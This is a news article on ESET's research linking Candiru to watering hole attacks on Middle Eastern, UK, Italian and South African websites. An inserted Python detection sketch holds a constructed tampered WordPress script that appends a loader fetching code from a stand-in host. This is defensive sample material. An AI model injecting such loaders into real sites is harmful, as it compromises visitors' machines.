Candiru linked to watering hole attacks in UK and Middle East

Candiru, an Israeli spyware vendor and surveillance company that was recently blacklisted by the US, has reportedly waged “watering hole” attacks against high-profile websites and organisations in the UK, the Middle East, Italy and even South Africa, according to new findings from ESET, a Slovakian cybersecurity firm.

The cyber attacks hit a wide variety of victims. ESET researchers stated that “the victimized websites belong to media outlets in the U.K., Yemen, and Saudi Arabia, as well as to Hezbollah” as well as “to government institutions in Iran (Ministry of Foreign Affairs), Syria (including the Ministry of Electricity), and Yemen (including the Ministries of Interior and Finance)” and “to internet service providers in Yemen and Syria”.

Interestingly, even aerospace and military technology companies in Italy and South Africa were hit by the “watering hole” cyber attacks. The threat actors also created a website impersonating a German medical trade fair. 

It’s believed that the watering hole campaign happened in two waves. The first began as early as March 2020 and lasted until August 2020, while the second began in January 2021 and ended in early August 2021, when the targeted websites were sanitised of the malicious scripts.

What is the attack? 

Watering hole attacks are a type of attack where malicious actors target a website frequently visited by members of a group that are “targets of interest” and compromise it by infecting it with a malicious script. The website acts as a jumping-off point: its regular users will visit it again at some point, and doing so opens up a gateway into their machines for hackers to exploit.

It is essentially the cyber equivalent of poisoning the village well. “The compromised websites are only used as a jumping-off point to reach the final targets,” ESET said. 

The first wave of attack chains involved injecting JavaScript code into the websites from a remote attacker-controlled domain designed to collect and exfiltrate IP geolocation and system information about the victim machine. 

The attack only proceeded further if the operating system hit was either Windows or macOS, indicating the attacks were primarily targeting computers and not mobile devices, unlike the Israel-related Pegasus spyware by the NSO Group, a far more prominent and infamous Israeli surveillance company. If the attack continued, a browser remote code execution exploit often enabled the threat actor to take control of victims’ computers.

In contrast, the second wave of attacks was stealthier: instead of injecting malicious code directly into the main HTML page, the attackers modified legitimate WordPress scripts used by the websites, such as “wp-embed.min.js”. The modification was used to load a script from a server under the threat actors’ control.
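A site operator can catch this kind of tampering by comparing served scripts with known-good hashes and checking them for script loaders that point off-site. The sketch below is an added example, not ESET's tooling or code from the original article; the file contents, host names and the `audit_script` helper are constructed for illustration.

```python
import hashlib
import re
from urllib.parse import urlparse

# Absolute or protocol-relative URLs inside JS string literals.
URL_RE = re.compile(r"""["'`]((?:https?:)?//[^"'`\s]+)["'`]""")
# Constructs commonly used to pull in a further script at run time.
LOADER_RE = re.compile(r"""createElement\(\s*["']script["']\s*\)|document\.write\(""")

def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()

def unexpected_hosts(js, allowed_hosts):
    """Hosts referenced by URL literals in js that are not on the allowlist."""
    found = set()
    for match in URL_RE.finditer(js):
        url = match.group(1)
        if url.startswith("//"):
            url = "https:" + url
        host = urlparse(url).hostname
        if host and host not in allowed_hosts:
            found.add(host)
    return sorted(found)

def audit_script(name, data, baseline, allowed_hosts):
    """Compare one served script with its known-good hash and scan it for loaders."""
    js = data.decode("utf-8", errors="replace")
    return {
        "file": name,
        "hash_mismatch": baseline.get(name) != sha256_hex(data),
        "dynamic_loader": bool(LOADER_RE.search(js)),
        "unexpected_hosts": unexpected_hosts(js, allowed_hosts),
    }

# Constructed sample data: a stand-in for the vendor file and a tampered copy.
CLEAN = b'!function(d,w){"use strict";w.wp=w.wp||{};}(document,window);'
TAMPERED = CLEAN + (b'var s=document.createElement("script");'
                    b's.src="//static.untrusted.example/t.js";'
                    b'document.head.appendChild(s);')
BASELINE = {"wp-embed.min.js": sha256_hex(CLEAN)}  # hash taken from a trusted copy
ALLOWED = {"www.site.example"}                     # hosts the site really loads from

if __name__ == "__main__":
    for body in (CLEAN, TAMPERED):
        print(audit_script("wp-embed.min.js", body, BASELINE, ALLOWED))
```

The hash comparison is the reliable signal; the pattern checks only help triage a mismatch, since an obfuscated loader would not match them.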

Notably, the fingerprinting script, which is used to draw an image and capture user browser data, harvested not only system metadata to capture the default language, but also the list of fonts supported by the browser, the list of browser plugins, and the time zone.


ESET was also able to link the second wave to a threat actor being tracked by Kaspersky, a Russian cybersecurity company, as Karkadann, citing overlaps in the tactics, techniques, and procedures (TTPs). Karkadann is an APT known for targeting government bodies and news outlets across the Middle East as of at least October 2020. 

Links between the campaign and Candiru were drawn when it was discovered that a few of the command-and-control servers used by the threat actors to carry out attacks bore similarities to domains which had already been identified as belonging to the Tel Aviv-based company. There was also medium confidence that “the operators of the watering holes are customers of Candiru” based on evidence ESET had collected.

A further link was timing: the attackers ceased operations at the end of July 2021, around the same time that public disclosures linked Candiru to the exploitation of zero-day vulnerabilities in the Google Chrome browser targeting victims in Armenia. The firm was also linked to exploitation of zero-day Windows vulnerabilities that targeted over 100 journalists, activists, political dissidents and academics globally.

“It seems that the operators are taking a pause, probably in order to retool and make their campaign stealthier,” said Matthieu Faou, an ESET malware researcher. “We expect to see them back in the ensuing months.”

At the moment, the exact exploit and the final payload delivered are unknown, showing “that the operators choose to narrow the focus of their operations and that they don't want to burn their zero-day exploits,” according to Faou. 

News of these cyber attacks comes only weeks after Candiru and NSO Group were added to a US blacklist by the Biden administration. Both Israeli firms had been accused of acting against US national security interests.
